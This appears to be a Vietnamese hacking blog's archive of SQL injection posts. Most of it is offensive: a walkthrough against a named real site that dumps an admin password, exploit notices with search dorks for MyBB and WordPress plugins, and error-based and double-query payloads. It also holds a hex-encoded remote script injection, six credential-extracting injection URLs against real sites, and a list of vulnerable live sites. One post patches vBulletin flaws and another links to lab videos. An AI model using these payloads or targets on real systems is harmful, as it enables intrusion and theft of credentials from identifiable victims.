Trang

Hiển thị các bài đăng có nhãn SQL Injection. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn SQL Injection. Hiển thị tất cả bài đăng

SQL UNHEX --- 403 --- LIMIT.

SQL UNHEX --- 403 --- LIMIT.



Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS





http://ibms.co/about.php?pid=34 ### is ok ###


http://ibms.co/about.php?pid=34' ### error ##


Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


http://ibms.co/about.php?pid=34+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+30--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+40--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+50--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+60--+- ### is ok ###

WTF i'm drunk ....mmm not ... here the solution ..add ---> ' <---

example: /about.php?pid=34'+order+by+1--+-

http://ibms.co/about.php?pid=34'+order+by+1--+-

start again

http://ibms.co/about.php?pid=34'+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+30--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+29--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+28--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+27--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+26--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+25--+- ### is ok ###

Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45

ok 25 Tables
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

now union+select

http://ibms.co/about.php?pid=34'+union+s...,24,25--+-

D: damn 403 f**k... i not want live in this world anymore...this website is secure D: ......


don't worry here the solution

add ( and )

example: /about.php?pid=34'+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25)--+-


http://ibms.co/about.php?pid=34'+union+(...24,25)--+-


done... now is ok again ..but not show the f**k column vulnerable...

only add ---> - <---

example: /about.php?pid=-34'+union+(select+1,2,3,

http://ibms.co/about.php?pid=-34'+union+...4​,25)--+-


well now show columns 6 and 7

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

now

add: unhex(hex(table_name)) +from+information_schema/**/.tables+where+table_schema=database()+LIMIT+0,200--+-

example

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+0,200)--+- ### ( show "Admin" ) ###

done luck today in the first table ---admin is Admin Meh ok next

change the 0 by LIMIT to 1

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+1,200)--+- ### ( show "Contact" ) ### ok leave it . already have the name ... is admin u see it before ...

ok now columns

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

############# now the columns ############


add: +union+select+1,unhex(hex(column_name)) +from+information_schema/**/.columns+where+table_schema=database()+LIMIT+0,200--+-


example:

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+0,200)--+- ### ( show "Id" ) ###

but we need user and pass.let's go to search it only change +LIMIT+0,200--+- TO +LIMIT+1,200--+-

and +LIMIT+2,200--+- and +LIMIT+3,200--+- etc....



########## this show username or admin user #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+1,200)--+- ###( show "Username" )###

done here the username but continue searching for the pass .....change it for 2 and 3 etc ...


########### this show password #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+2,200)--+- ###( show "Password" )###

well username and password by admin

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++++++++++++++++++++++
+++++++++++++++++

now dump dates ...

add: unhex(hex(username)) and +from+admin)--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "admin" ) = username = admin) ###



now column "password"

example: unhex(hex(password)),3,4,5,6, and +from+admin--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "Ibmsanusha" ) = password = Ibmsanusha )###


Done..Enjoy testing others Websites.



REMEMBER

Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS

Xem Thêm

 

MyBB Ajaxfs 2 Plugin - SQL Injection Vulnerability

###########################

# Mybb Ajaxfs Plugin Sql Injection vulnerability

###########################

#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################

# Exploit Title : Mybb Ajaxfs Plugin Sql Injection vulnerability

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : [email protected] - [email protected]

# Home : http://iedb.ir - http://iedb.ir/acc

# Fb Page : https://www.facebook.com/pages/Explo...99266860256538

# Software Link : http://mods.mybb.com/download/ajax-forum-stat-v-2

# Security Risk : High

# Tested on : Linux

# Dork : inurl:ajaxfs.php

#################################

1)

if(isset($_GET['tooltip']))
{
$pid=$_GET['tooltip'];
$query_post = $db->query ("SELECT * FROM ".TABLE_PREFIX."posts WHERE pid='$pid'");


2)

if(isset($_GET['usertooltip']))
{
$uid=$_GET['usertooltip'];
$query_user = $db->query ("SELECT * FROM ".TABLE_PREFIX."users WHERE uid='$uid'");

http://localhost/Upload/ajaxfs.php?usertooltip=1'

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

Google DORK : inurl:ajaxfs.php


# Exploit :

# http://site.com/mybb/ajaxfs.php?tooltip=[sql]

# http://site.com/mybb/ajaxfs.php?usertooltip=[sql]


#################################

# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

#################################

Xem Thêm

 

Tool] Quick Blind SQL Injection script

Đây là script được code bằng python…Tự động khai thác dạng sql injection quick blind

Điều kiện: cài python và wget cho python

Gồm 2 class…(thật ra 1 cũng được nhưng để dành phát triển) và 1 hàm main

Các bạn có chỉnh sửa gì cứ mở file main.py ra sửa nha.

Ví dụ:

inject_link = ‘http://edu.hiast.edu.vn/index.php?pg=tintuc&task=chitiet&p2=26&p3=4331 ‘

Các bạn có thể đổi thành site xpath bất kỳ với định dạng caigido=sogido (sorry, mới làm được dạng này)

Lang man quá, đây là link tải Big Grin

sqli: Base class

sqli quick blind: Quick blind exploit

main application

Demo:





















































[Hình: Untitled12.png]

Xem Thêm

 

[TUT] Khai thác lỗi SQL Injection dạng error-based quick blind

Ví dụ victim có dạng:

http://target.com/page.php?id = 1

Lệnh get version, database

http://target.com/page.php?id = 1 [color=#ffffffff]And (Select 1 From(Select Count(*),Concat(CHAR (124),(Select Concat(version(),0x7c,database(),0x7c,user())),floor(rAnd(0)*2),CHAR (124))x From Information_Schema.Tables Group By x)a)[/color]

Tương tự vậy, lệnh get table:

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),1,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

Bạn để ý chỗ 1,145…Tăng số 1 đó thành một số lớn hơn (thường là số ký tự được trả ra trong dấu ngoặc kép sau phần duplicate entrie….)

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(table_name),63,145) FROM information_schema.tables where table_schema=database()),floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

Tiếp theo, lấy column của một table nào đó

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name),1,145) FROM information_schema.columns where table_schema=database() and table_name=0xso_hex_cua_tablename) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

Tăng số 1 theo nguyên tắc như trên.

Và cuối cùng là dữ liệu:

And (Select 1 From( Select Count(*), Concat(CHAR (124), (Select substr(Group_concat(column_name_1,0x7c,column_name_2),1,145) FROM table_name_nao_do) ,floor(rAnd(0)*2), CHAR (124))x FROM Information_Schema.Tables Group By x)a)

CEH

Xem Thêm

 

Wordpress WP Realty Plugin - Blind SQL Injection

$$$$$$\      $$\   $$\     $$$$$$\ 
$$  __$$\     $$ |  $$ |   $$  __$$\
$$ /  \__|    $$ |  $$ |   $$ /  \__|
$$ |$$$$\     $$$$$$$$ |   \$$$$$$\ 
$$ |\_$$ |    $$  __$$ |    \____$$\
$$ |  $$ |    $$ |  $$ |   $$\   $$ |
\$$$$$$  |$$\ $$ |  $$ |$$\\$$$$$$  |
 \______/ \__|\__|  \__|\__|\______/
  
# Exploit Title: Wordpress - wp-realty - MySQL Time Based Injection
# Google Dork: inurl:"/wp-content/plugins/wp-realty/"
# Vendor: http://wprealty.org/
# Date: 10/08/2013
# Exploit Author: Napsterakos
 
 
Link: http://localhost/wordpress/wp-content/plugins/wp-realty/
 Exploit: http://localhost/wordpress/wp-content/plugins/wp-realty/index_ext.php?a
ction=contact_friend&popup=yes&listing_id=[SQLi]Credits to: Greek Hacking Scene

Xem Thêm

 

Whmcs 5.2.7 sqli injection

So, Friends and Enemies :p here is the Lastest Vulnerability Leaked in Black Hackers Market for WHMCS

Vulnerability Effects:

/includes/dbfunctions.php:

<?php function update_query($table, $array, $where) { #[...] if (substr($value, 0, 11) == 'AES_ENCRYPT') { $query .= $value.','; continue; } #[...] $result = mysql_query($query, $whmcsmysql); } ?> and download exploit from following link Exploit in python: http://www.mediafire.com/download/be...t4scl/whmcs.py Exploit in php: http://www.mediafire.com/download/5y10bzblp9bo92q/cyberaon(2).php Register a new user on a target WHMCS install (/register.php)
and edit the exploit with site name, email and password.

Vietnamese version :

hào các bạn,

Ngay từ khi WHMCS, một mã nguồn quản lý hosting khá nổi tiếng cho ra mắt bản 5.2.7, hãng này đã bỏ qua một lỗ hỏng bảo mật khá nghiêm trọng trong việc khai báo các hàm kết nối cho mysql "dbfunction.php"

/includes/dbfunctions.php:


PHP Code:
<?php
function update_query($table, $array, $where) {
#[...]
if (substr($value, 0, 11) == 'AES_ENCRYPT') {
$query .= $value.',';
continue;
}
#[...]
$result = mysql_query($query, $whmcsmysql);
}
?>


Sau khi test trên một script SQLI hoặc một python tương tự, kết quả trả về như thế này sau khi exploit ...

Script dùng exploit ..

Download tại : https://minhkhang.org/dl.php?type=d&id=8
hoặc đính kèm: http://sinhvienit.net/forum/attachme...cs_exploit.zip

Xem Thêm

 

Auto Khai Thác SQL Injection (Update)

I- JS Khai thác sqli







Download Code:
-úp file js lên hosting.
-sử link js trong sript sau:
Quote:
<script src='http://link.com/sqli.js'></script>
VD:

Quote:
<script src='http://thptquangha.com/sqli.js'></script>
-sau đó convert đoạn sript trên sang hex.
- ta được :
Quote:
3c736372697074207372633d27687474703a2f2f7468707471 75616e6768612e636f6d2f73716c692e6a73273e3c2f736372 6970743e

- dùng nó trong thẻ sau:


concat((0x mã hex))vnhack

VD:
Quote:
concat((0x3c736372697074207372633d27687474703a2f2f 746870747175616e6768612e636f6d2f73716c692e6a73273e 3c2f7363726970743e))vnhack
- đã xong. giờ ví dụ bạn đang khai thác 1 site bị sqli.
đã tìm được số lỗi. bạn chỉ việc chèn đoạn trên vào 1 trong các số lỗi đó. tiếp theo bạn tự tìm hiểu .
( cái này không hẳn site nào cũng khai thác được ).

-VD với js trên :
=======================================


II- Hoặc 1 js khác : cái này dễ nhìn hơn cái trên






download:
Quote:
http://kemlam.com/?content=detail&pr...,9,10,11,12,13

Xem Thêm

 

SQL Injection - Labs series

Link to part 1: http://www.securitytube.net/video/4171
Link to part 2: http://www.securitytube.net/video/4200
Link to part 3: http://www.securitytube.net/video/4208
Link to part 4: http://www.securitytube.net/video/4210
Link to part 5: http://www.securitytube.net/video/4269
Link to part 6: http://www.securitytube.net/video/4283
Link to part 7: http://www.securitytube.net/video/4303
Link to part 8: http://www.securitytube.net/video/4326
Link to part 9: http://www.securitytube.net/video/4399
Link to part 10: http://www.securitytube.net/video/4532
Link to part 11: http://www.securitytube.net/video/4650
Link to part 12: http://www.securitytube.net/video/4667
Link to part 13: http://www.securitytube.net/video/4672
Link to part 14: http://www.securitytube.net/video/4672
Link to part 15: http://www.securitytube.net/video/5104
Link to part 16: http://www.securitytube.net/video/5562
Link to part 17: http://www.securitytube.net/video/6035
Link to part 18: http://www.securitytube.net/video/6176


Link for test bed: https://github.com/Audi-1/sqli-labs

Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Xem Thêm

 

SQL Injection - Double Query - Tutorial

Hey guys,

Okay, so I will be showing you how to apply a Double Query Sql Injection...

So what you have to know is that the stuff you're going to read about here does always works 100 % and am telling you that because I have a 10 years experience hacker so suck it...



Anyways, lets begin:


Some people may be wondering that there's lots of types for Sql Injection but when the fuck am I suppose to use this one and when the fuck I am suppose that one... So yeah, about MySql Double Query Sql Injection you use this method more then once but mostly you use it when you're applying:

Code:


Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,6--

No that's just an example, it can be Union All Select it can be String Injection it can be whatever you want, just, when you do so, it will give you a MySql Error that is similar to the shit in that box down there:

Code:
Mã:
Different Number of Columns

So when this happens don't open Havij or whatever that Gay Tool you love... Use your fucking knowledge...

Anyways, now I will show you the steps and I will try to explain what's happening down there and I will also show you what some People uses and what I use (which is actually, the stuff you should use).


Ok, so now, we got this gay "Different Number of Columns" Error, firstly we say "We don't give a shit" Secondly we begin our attack...


Ok, lets get the boring stuff but they are important:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(version(),user(),@@hostname,0x7e,@@datadir) as char),0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now as you can see, this will show you the Version, the User, the Hostname and the Datadir...

Now some people just add "version()" why? I mean why the fuck do you wanna get them one by one when you can get them all together at once...

So whatever happens stick to that code up there and enough with bullshits...


Okay, so now we got these info, now lets get the Databases...

Many many fucking noob people use this in all their Sql Injection not only in Double Query : database()
Well, for these people: do you fucking know that this is gay?
This will only show you only 1 Database... If the Website you're hacking have like 10 database your query is a fucking fail so never use that...

Example for Double Query:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

as you can see, the stuff up there is the gay stuff that most people use... Stop using that please, just fucking stop...

use this one:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,schema_name,7,8 from information_schema.schemata--

And this will show you ALL THE DATABASES AT ONCE...

but using this gay code:

Code:
Mã:
whatever.com/index.php?id=-myass union select 1,2,3,4,5,database(),7,8--

will only show 1 Database...



Ok so now he have all the Databases, lets move on to getting the Tables...

This is what you should use to get the Tables:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1


Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(column_name as char),0x27,0x7e) FROM information_schema.columns Where table_schema=0x"HEXDATABASE" AND table_name=0x"HEXTABLENAME" LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now here, it's just like getting the tables but we're getting the columns, to get the columns we should also Say from which Table so we just add "And table_name=0xHEXEDTABLENAME"
Surely, you have to put the hex of the Table Name instead of that and Increase the Limits to get all the Columns...


Now lets Retrieve Data from the Columns, that's the good part lol:

So that's the part were the gayness appear from couple of people out there, so I will actually show you how to do it the right way...

Let me first show you what other people use and how gay it is and why...

Some people use this:

Code:
Mã:
whatever.com/index.php?id=myass and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast("tablename"."columnname" as char),0x27,0x7e) FROM "databasename"."tablename" LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

So as you can see, the people who uses this code are very detailed but kind of gay... they use tablename.columnname
Why is that weak? firstly no need to write the same thing over and over again because in the same query you're saying which Table when you write databasename.tablename... Secondly this will only show you the data of 1 column? Why? Why don't you see the Data of 14213451234 Columns at a time? It's faster, so stop being fucking stupid...


Now some people use this one:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select concat(username,0x7e,pass,0x7e7e) from "table" limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Now this is better, as you can see we are retreiving the Data of more then 1 column at a time which is good but where it says from "table" is the bad thing because you're not precising which Database and you don't want to risk that because what if there's 2 Databases and both of them have the same table name but with different data you will be like owned by yourself...

So here's what to use:

Code:
Mã:
whatever.com/index.php?id=myass and (select 1 from (select count(*),concat((select(select concat(cast(concat(COLUMN_NAME,0x7e,COLUMN_NAME) as char),0x7e)) from database.table limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

So why this is better? Firstly because we're getting Data from more then 1 column at once and secondly because we're giving the right details to get the right info by using database.table, so we're just giving it everything the right way...


Some Fucking Stuff you should know:

1- Never forget to increase the limits
2- Sometimes you can use Char instead of Hex if it didn't work but this is very very rare
3- Doing a Sql Injection is simple, you should just understand what you're typing and pretend you're talking to somebody...
4- Don't be stupid


Okay we're done, this took me a while to write and I don't really fucking care if you like it or not but I am pretty sure this will increase your knowledge in a way or another and will get us more members here...

Take care all,

Xem Thêm

 

Hướng dẫn khắc phục 2 lỗi bảo mật nghiêm trọng của vBulletin

SinhVienIT.NET---vbulletin-security-alert


2 lỗi mà mình nói đến là lỗi SQL Injection của mod Chang stat và lỗi CSRF để add plugin.

1. Lỗi SQL Injection của Changuondyu Statistics
Khi khai thác lỗi này, attacker sẽ lấy được gần như toàn bộ database của bạn nếu muốn. Và thông thường, cái attacker nhắm đến là table user. Khi lấy được 3 cột: userid, password và salt => Attacker có thể login vào tài khoản của bất kỳ user nào mà không cần biết password là gì (Với điều kiện là Admin không biết config đúng file config.php cùa vBB).
Để fix lỗi này, có 2 cách mình đề xuất các bạn có thể thực hiện.

Cách 1:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data

Tìm:
PHP Code:
$foruminid $vbulletin->db->escape_string($_REQUEST['listforumid']); 
Thêm vào bên dưới
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminid preg_replace("/[^0-9,]+/","",$foruminid);//---End---By: Vũ Thanh Lai - SinhVienIT.Net 

Cách 2:
AdminCP->Plugin Manager->ChangUonDyU - Advanced Statistics - Get Data

Tìm:
PHP Code:
$foruminid $vbulletin->db->escape_string($_REQUEST['listforumid']); 
Thêm vào bên dưới
PHP Code:
//---Loại bỏ ký tự nguy hiểm tránh SQL injetion$foruminidx explode(',',$foruminid);
foreach(
$foruminidx as &$id)
{
    
$id=intval($id);
}
$foruminid=implode(',',$foruminidx);//---End---By: Vũ Thanh Lai - SinhVienIT.Net 


2. Lỗi CSRF
Với lỗi này, attacker phải có quyền từ SMod trở lên. Nếu nói đây là 1 lỗi thì cũng chưa chuẩn lắm. Vì nếu nó là 1 lỗi thì chả khác nào câu "Hacked by Admin" 4
Tuy nhiên, dù thế nào đi nữa, cái này cũng giúp 1 user có quyền SMod "leo thang đặc quyền được".

Cách khai thác lỗi này thì cũng đã được công bố chi tiết.

Để fix lỗi này mình đề xuất 2 cách.

Cách 1:
Đây là cách đơn giản nhất là bạn đổi thư mục AdminCP và không tiết lộ thư mục AdminCP mới cho bất kỳ ai biết.
Sau khi đổi nhớ sửa lại tên thư mục admin trong file config.php ở phần
PHP Code:
$config['Misc']['admincpdir'
Tuy nhiên, khi sử dụng cách này thì sẽ có thể gây ra 1 số mod có phần admincp hoạt động sai hoặc ko hoạt động... Nên khi dùng cách này các bạn cần lưu ý.


Cách 2:
Bạn sử dụng Mod này. Khi dùng mod này, mỗi lần có 1 request gửi đến AdminCP thì referer trong HTTP Header sẽ đc kiểm tra xem request đó đến từ trang nào trong forum. Nếu không phải từ AdminCP thì bạn phải click xác nhận thì request mới đc tiếp tục xử lý.

Attacker đã làm như thế nào ?
Thời gian gần đây, attacker hay đi lục lọi các forum có sử dụng mod Changuondyu Statistics để tìm cách đưa câu "Hacked by..." vào đó. Sau khi khai thác lỗi này, chúng sẽ login đc vào tài khoản của SMod hoặc Admin để lợi dụng tiếp lỗi thứ 2 bên trên để chèn shell. Và thế là xong 4

Các Admin đã ngây thơ như thế nào ?
Trong file config.php của vBulletin có 1 phần mà hầu hết các Admin đều bỏ qua đó là COOKIE SECURITY HASH
PHP Code:
$config['Misc']['cookie_security_hash'
Thông thường, các admin để trống phần này trong file config mà không hề biết tầm quan trọng của nó. Để hiểu nó quan trọng như thế nào. Mình sẽ nói chi tiết để các bạn hiểu cơ chế hoạt động của nó.

Khi 1 user login vào forum nếu có check dấu ghi nhớ để lần sau không phải login lại khi hết cookie timeout thì phía client sẽ có 3 cookie đc thiết lập.
cookieprefix_userid,cookieprefix_password và cookieprefix_remember

cái userid và remember chắc mình không cần nói, cái password nó không phải là password của người dùng, cũng không phải là password trong cột password của table user.
Nó là kết quả
PHP Code:
MD5(Cột_Password_Trong_table_User.$config['Misc']['cookie_security_hash']) 
Như vậy, nếu attacker khai thác đc 1 lỗi SQL Injection nào đó trên forum của bạn và lấy đc 1 số record trong table user mà giá trị cookie_security_hash bạn để trống trong file config.php thì tất nhiên, attacker sẽ dễ dàng login đc vào bất kỳ tài khoản nào bằng cách thiết lập cookie trên trình duyệt 3 cookie mình đã để cập bên trên.

Còn nếu bạn có thiết lập giá trị cookie_security_hash ? Attacker không thể biết đc giá trị này nếu chưa attack vào đc host của bạn hay có shell trên server. Như vậy, cho dù có lấy đc cả table user thì attacker cũng không thể nào login vào bất kỳ tài khoản nào cả (ngoại trừ trường hợp bạn sử dụng password quá đơn giản như 123456 4)

Vì vậy, khi đọc xong bài này, hãy mở ngay file config của bạn lên và thêm 1 chuỗi ký tự bất kỳ vào $config['Misc']['cookie_security_hash'] nhé. Làm ngay và luôn kẻo bị attack nhé 4

Nguồn: Sinhvienit.net

Xem Thêm

 

Smart Hunter v.1.4.3 Public Version

Smart Hunter v.1.4.3 Public Version | Juno_okyo's Blog 
Smart Hunter v.1.4.3 Public Version | Juno_okyo's Blog

Download : http://adf.ly/FRrSF


Xem Thêm

 

6 Random Injections

1
Mã:
http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username, ​0x3b,password),5,6,7,8,9,10 from users_tbl--

2/

Mã:
http://www.nbjm-sprayer.com/products.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1 ​9,20,21,22,23 from user_table--

3/

Mã:
http://www.mcdonaldlawoffice.net/story.php?articleid=-8 UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--

4/

Mã:
http://localtime.biz/product.php?cat_id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b, ​pwd,0x3c,0x62,0x72,0x3e),4 from users--

5/

Mã:
http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

6/

Mã:
http://www.media4world.de/mini_d/list_art.php?shop=-5 UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--

Xem Thêm

 

- Site lỗi SQL

Found : http://www.falconhead.com/products.php?id='11
Found : http://www.solobambini.com/products.php?products_line_id='1
Found : http://www.crispi.it/it/products.php?id_menu='2
Found : http://www.jrmerritt.com/products.php?page_id='135
Found : http://www.downhilldragonclan.com/products.php?id='42
Found : http://www.tekaillumination.com/products.php?ID='92
Found : http://www.med-int.com/products.php?id='13
Found : http://www.actmachines.com/cart/products.php?id='87
Found : http://www.mtiadventurewear.com/products.php?id='40
Found : http://www.stringease.com/products.php?cat='snaps&id='fastach_clips
Found : http://www.tonyjeary.com/products.php?cat_id='2
Found : http://www.bmfwallets.com/products.php?id='6
Found : http://www.flexiblewhips.com/products.php?id='10
Found : http://www.pepperball.com/products.php?category_id='51
Found : http://www.duckhuntingwaders.com/products.php?ID='552
Found : http://www.matrixinnovations.co.uk/products.php?id='1
Found : http://www.stormtec.ca/products.php?id='4
Found : http://www.stormtec.ca/products.php?id='11
Found : http://wayet-lighting.com/products.php?id='2
Found : http://wayet-lighting.com/products.php?id='2
Found : http://remsoft.com/products.php?id='1
Found : http://www.esoterikaudio.com.au/products.php?product_id='31
Found : http://www.gsboxing.com/products.php?iD='70-0-0-0
Found : http://www.everyway-medical.com/products.php?id='35
Found : http://www.midwestfolding.com/products.php?prodline_id='11&product_id='307
Found : http://www.advantagecontrols.com/products.php?category_id='3&products_id='7
Found : http://www.crispi.it/it/products.php?id_menu='1
Found : http://www.dxgeneration.com/products.php?details-id='30
Found : http://www.stormtec.ca/products.php?id='3
Found : http://www.najarianfurniture.com/products.php?id='40
Found : http://www.rajagro.com/products.php?cat_id='8
Found : http://www.antiques-oronoco.com/products.php?id='176
Found : http://www.hughes-and-kettner.com/products.php5?mode='prod&id='115
Found : http://sivaana.com/products.php?cat_id='1&page='0
Found :
http://www.phidgets.com/products.php?category='13%26product_id='1062"target='"_blank
http://www.rideitmoto.com/products.php?id='16"target='"_blank
http://www.cheekyherbs.com/products.php?id='8"target='"_blank
http://www.simiotica.com/products.php?id='12"target='"_blank
http://www.musicalsounds.us/products.php?id='MOSSCADE"target='"_blank
http://www.shopbabybliss.com/products.php?id='53"target='"_blank
http://proforceequipment.com/products.php?id='25"target='"_blank
http://www.aor.ca/html/products.php?id='14"target='"_blank
http://www.jsr-productions.com/products.php?id='16"target='"_blank
http://www.thebellydanceshop.com/products.php?id='22"target='"_blank
Found :
http://www.drnorthrup.com/bookstore/northrup_products.php?product_id='238"target='"_blank
http://www.unitedforms.com/products/products.php?id='3%26product_id='2"target='"_blank
http://www.thintuition.com/products.php?category_id='103"target='"_blank
http://www.cubancrafters.com/products/DESKTOP-HUMIDORS-BY-CUBAN-CRAFTERS-%25252d-100-CIGAR-BARGAIN-HUMIDOR-FEATURES-GLOSS-ROSEWOOD-WITH-SPANISH-CEDAR-INTERIOR.html"target='"_blank
http://www.mdhelicopters.com/products.php?id='MD_600N"target='"_blank
http://www.tonartllc.com/products.php?id='floating-buddha"target='"_blank
http://metalkraft.com/products.php?id='6"target='"_blank
Found :
http://www.gs-sport.com/products.php?en_product_id='2"target='"_blank
http://www.thermalright.com/products/index.php?cat_id='27"target='"_blank
http://www.sanyohvac.com/products.php?id='12KHS71"target='"_blank
http://www.pistolgear.com/products.php?id='46"target='"_blank
http://www.akiles.com/products.php?category_id='13%26product_id='1080"target='"_blank
http://www.icandyuk.com/products.php?id='cherry"target='"_blank
http://www.brookfieldpoultryequipment.com/products.php?id='50"target='"_blank
http://www.flightdecksolutions.com/list_products.php?id='22"target='"_blank
http://www.eurocomponentsusa.com/frame_%26_suspension/products.php?id='0504"target='"_blank
http://www.protofab4x4.com/products.php?ID='05"target='"_blank
http://www.avalonprod.com/products.php?prod_id='40"target='"_blank
http://www.riderstation.com/catalog/products.php?id='35"target='"_blank
http://www.eotech-inc.com/products.php?id='3"target='"_blank
http://www.unitedforms.com/products/products.php?id='1%26product_id='1"target='"_blank
http://www.therealseedcompany.com/products.php?product_id='12"target='"_blank
http://plywood.boatbuildercentral.com/products.php?id='3"target='"_blank
http://www.louroe.com/products.php?id='55"target='"_blank
http://www.fabricut.com/products.php?id='3"target='"_blank
http://www.hubbardbreeders.com/products.php?id='11"target='"_blank
http://www.filzer.com/products.php?cat_id='1"target='"_blank
http://www.alphaplugins.com/products/products.php?menu='get_prod_id%26prod_id='2"target='"_blank
http://www.911medicalid.com/products.php"target='"_blank
Found :
http://www.thebellydanceshop.com/products.php?id='5"target='"_blank
http://dualsportarmory.com/products.php?category_id='141"target='"_blank
